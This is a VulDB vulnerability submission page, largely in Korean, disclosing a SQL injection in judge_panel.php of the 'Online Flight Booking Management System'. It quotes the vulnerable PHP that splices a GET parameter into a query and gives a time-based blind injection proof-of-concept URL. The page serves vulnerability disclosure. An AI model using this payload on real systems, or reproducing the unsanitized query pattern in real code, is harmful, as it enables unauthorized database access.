제출 #71813: Online Flight Booking Management System judge_panel.php has SQLinject.정보

제목Online Flight Booking Management System judge_panel.php has SQLinject.
설명<?php error_reporting(0); include('header2.php'); include('session.php'); $judge_ctr=$_GET['judge_ctr']; $subevent_id=$_GET['subevent_id']; $getContestant_id=$_GET['contestant_id']; $pageStat=$_GET['pStat']; ?> <?php $event_query = $conn->query("select * from sub_event where subevent_id='$subevent_id'") or die(mysql_error()); while ($event_row = $event_query->fetch()) { ?> <?php $se_MEidxx=$event_row['mainevent_id']; $se_namexx=$event_row['event_name']; $se_statusxx=$event_row['status']; ?> Because the string entered by the user is not filtered and the sql statements are spliced, the sql injection vulnerability is generated. It can cause serious harm to the system. poc: http://127.0.0.1/judge_panel.php?judge_ctr=&subevent_id='and(select*from(select+sleep(2))a/**/union/**/select+1)='&contestant_id=
원천⚠️ https://github.com/qyhmsys/cve-list/blob/master/Online%20Flight%20Booking%20Management%20System%20judge_panel.md
사용자
 wei.zhang (UID 38856)
제출2023. 01. 13. AM 07:45 (3 연령 ago)
모더레이션2023. 01. 13. AM 10:18 (3 hours later)
상태수락
VulDB 항목218276 [SourceCodester Online Flight Booking Management System judge_panel.php subevent_id SQL 주입]
포인트들20

이전개요다음

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!